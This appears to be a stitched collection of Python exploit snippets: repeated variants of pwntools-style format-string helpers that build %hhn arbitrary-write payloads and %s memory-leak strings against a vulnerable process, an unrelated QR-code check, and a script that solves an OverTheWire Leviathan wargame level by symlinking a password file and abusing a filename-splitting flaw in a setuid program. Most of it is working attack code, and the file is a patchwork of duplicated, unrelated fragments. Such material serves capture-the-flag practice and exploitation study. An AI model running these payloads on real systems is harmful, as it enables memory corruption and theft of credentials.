def qrcode_check(self):
txt = randoms(random.randint(10, 40))
log.info('qrencode %s', txt)
qr = self.translate('qrencode', txt)
encoding = random.choice(['b64', 'hex'])
log.info('qrdecode (%s)', encoding)
txt_ = self.translate('qrdecode', _encode(qr, encoding), encoding)
if txt != txt_:
self.check_fail('%s not matched %s' % (txt, txt_))
return False
return True
def execute_writes(self):
"""execute_writes() -> None
Makes payload and send it to the vulnerable process
Returns:
None
"""
fmtstr = randoms(self.padlen, string.ascii_letters.encode("utf8"))
fmtstr += fmtstr_payload(self.offset, self.writes, numbwritten=self.padlen, write_size="byte")
self.execute_fmt(fmtstr)
self.writes = {}
def execute_writes(self):
"""execute_writes() -> None
Makes payload and send it to the vulnerable process
Returns:
None
"""
fmtstr = randoms(self.padlen)
fmtstr += fmtstr_payload(self.offset, self.writes, numbwritten=self.padlen, write_size='byte')
self.execute_fmt(fmtstr)
self.writes = {}
def execute_writes(self):
"""execute_writes() -> None
Makes payload and send it to the vulnerable process
Returns:
None
"""
fmtstr = randoms(self.padlen).encode()
fmtstr += fmtstr_payload(self.offset, self.writes, numbwritten=self.padlen + self.numbwritten, write_size='byte')
self.execute_fmt(fmtstr)
self.writes = {}
def _leaker(self, addr):
# Hack: elfheaders often start at offset 0 in a page,
# but we often can't leak addresses containing null bytes,
# and the page below elfheaders is often not mapped.
# Thus the solution to this problem is to check if the next 3 bytes are
# "ELF" and if so we lie and leak "\x7f"
# unless it is leaked otherwise.
if addr & 0xfff == 0 and self.leaker._leak(addr+1, 3, False) == "ELF":
return "\x7f"
fmtstr = randoms(self.padlen) + pack(addr) + "START%%%d$sEND" % self.offset
leak = self.execute_fmt(fmtstr)
leak = re.findall(r"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0]
leak += "\x00"
return leak
def _leaker(self, addr):
# Hack: elfheaders often start at offset 0 in a page,
# but we often can't leak addresses containing null bytes,
# and the page below elfheaders is often not mapped.
# Thus the solution to this problem is to check if the next 3 bytes are
# "ELF" and if so we lie and leak "\x7f"
# unless it is leaked otherwise.
if addr & 0xfff == 0 and self.leaker._leak(addr+1, 3, False) == b"ELF":
return b"\x7f"
fmtstr = randoms(self.padlen).encode() + pack(addr) + b"START%%%d$sEND" % self.offset
leak = self.execute_fmt(fmtstr)
leak = re.findall(br"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0]
leak += b"\x00"
return leak
def _leaker(self, addr):
# Hack: elfheaders often start at offset 0 in a page,
# but we often can't leak addresses containing null bytes,
# and the page below elfheaders is often not mapped.
# Thus the solution to this problem is to check if the next 3 bytes are
# "ELF" and if so we lie and leak "\x7f"
# unless it is leaked otherwise.
if addr & 0xFFF == 0 and self.leaker._leak(addr + 1, 3, False) == b"ELF":
return b"\x7f"
fmtstr = randoms(self.padlen, string.ascii_letters.encode("utf8"))
fmtstr += pack(addr)
fmtstr += "START%{}$sEND".format(self.offset).encode("utf8")
leak = self.execute_fmt(fmtstr)
leak = re.findall(b"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0]
leak += b"\x00"
return leak
def execute_writes(self):
addrs = []
bytes = []
#convert every write into single-byte writes
for addr, data in self.writes:
data = flat(data)
for off, b in enumerate(data):
addrs.append(addr + off)
bytes.append(u8(b))
fmtstr = randoms(self.padlen) + flat(addrs)
n = self.numbwritten + len(fmtstr)
for i, b in enumerate(bytes):
b -= (n % 256)
if b <= 0:
b += 256
fmtstr += "%%%dc%%%d$hhn" % (b, self.offset + i)
n += b
self.execute_fmt(fmtstr)
self.writes = []
def execute_writes(self):
addrs = []
bytes = []
#convert every write into single-byte writes
for addr, data in self.writes:
data = flat(data)
for off, b in enumerate(data):
addrs.append(addr+off)
bytes.append(u8(b))
fmtstr = randoms(self.padlen) + flat(addrs)
n = self.numbwritten + len(fmtstr)
for i, b in enumerate(bytes):
b -= (n % 256)
if b <= 0:
b += 256
fmtstr += "%%%dc%%%d$hhn" % (b, self.offset + i)
n += b
self.execute_fmt(fmtstr)
self.writes = []
from pwn import *
from pygments import highlight
from pygments.lexers import CLexer
from pygments.formatters import TerminalFormatter
from pwnlib.util.fiddling import randoms
from time import sleep
level = 2
user = '******' % level
host = 'leviathan.labs.overthewire.org'
password = '******'
port = 2223
def connectToLevel():
return ssh(user=user, host=host, port=port, password=password)
context(arch='i386', os='linux')
# Base folder for unpack
UNPACK_FOLDER = '/tmp/%s' % randoms(10)
sh = connectToLevel()
sh = sh.process('/bin/sh', env={'PS1': ''})
sh.sendline('mkdir -p %s' % UNPACK_FOLDER)
sh.sendline('cd %s' % UNPACK_FOLDER)
sh.sendline('ln -s /etc/leviathan_pass/leviathan3 leviathan3')
sh.sendline('touch "tmp leviathan3"')
sh.sendline('/home/leviathan2/printfile "tmp leviathan3" 2>/dev/null')
log.info('Flag = %s' % sh.recvline())
